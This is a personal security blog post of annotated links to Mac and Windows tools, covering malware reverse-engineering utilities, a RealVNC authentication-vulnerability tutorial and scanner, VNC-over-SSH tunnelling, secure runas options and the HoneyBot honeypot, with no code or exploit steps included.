mac tools

This site purports to be a list of Mac hacking tools, but I see it more as a list of lesser-known general tools for Mac, some of which may only be useful to me if I get back into programming at some point. At any rate, a good list of tools with a blitz on what they’re used for and common switches.

reverse engineering windows malware

Snagged a bunch of tools and links dealing with reverse engineering malware, particularly Windows, but also other stuff. This is an area I’d love to get into some day, perhaps when I get more into coding as well. Either way, it is always useful to exercise ones ability to figure out what malware is doing, whether you use a live box and lab network or examine the code straight-up.

IDA Pro – the universal first choice in malware analysis
Import Rec
PaiMai and PyDbg
Pydasm and Pydot
ISA sync

vnc auth vulnerability

This is an awesome tutorial for examining and finding and exploiting the latest RealVNC Auth Vulnerability. I have a link to a scan tool that scans for this, and I have to find it. I suppose Metasploit will have this packaged already or soon. The fun thing about this is that I imagine most IT shops do not upgrade all their old VNC instances very much and either just use the same executable stored locally or always download a new one. I would bet many admins are still blissfully ignorant of this issue, and thus still have many vulnerable installs still sitting around. I consider this a must-have scan for any VNC instances found on a target network.

Update: the scanner

tunnel vnc over ssh

This article explains how to tunnel VNC traffic over SSH to create a secure means to connect back to your home computer from anywhere. I’ve always wanted to do this and have yet to do it. Basically this is just about poking a hole in your home firewall, setting up an SSH server, and doing a port forware on that SSH server to the internal VNC-equipped system. Nothing rocket-science here, and the technique can be used for pretty much anything. We actually used a similar technique in my old job before we moved to a full VPN solution.

Want to run OpenSSH on a Windows box? This fun tutorial goes through this (overly complex) process!

scripted secure runas

Sometimes you need to regularly runas an admin in Windows, but you might not necessarily want to give the user the local or domain admin password or save it in a cleartext file or shortcut or run over to type it in when needed. These are some options for secure ways of performing a runas. I’ve once used CPAU and it worked rather well. I had to give a SQL DBA access to production SQL servers and allow him to access other servers through admin shares via Enterprise Manager. Rather than give him a domain admin account or mess with permissions or store it in cleartext in a file or shortcut where he could look it up if he wanted to, I made a “secure” shortcut using CPAU. Pretty slick, and while it may have holes, it likely will stop any insiders from easily obtaining the credentials. This can be used for lesser instances like a user’s program that might need some admin rights somewhere and not run otherwise.

Thie page has a bunch of choices for situations where runas needs to be secure.

im lock to lock down im apps

IM Lock sounds like it can lock IM programs from operating in Windows. I think this can be better solved with software policies and audits, and removing admin rights for users. And the method to get around all of the above, using stand-alone, non-installable “underground” apps for IMs still works regardless of any of these methods. So…might be interesting in case someone wants something like this.


cURL is a Windows utility in much the same vein as the generic “GET” command in *nix where you can run “http-style” requests from the command line. Pretty nifty!


honeybot: honeypot for windows

HoneyBot has been released and is a honeypot app for Windows. This is pretty downright cool, and I need to find a box/place to put this up sometime…link found through Darknet. There’s two systems I’ve wanted to have for sometime: a honeypot to play with people/apps that break in and a firewall/sniffer that just collects traffic and statistics.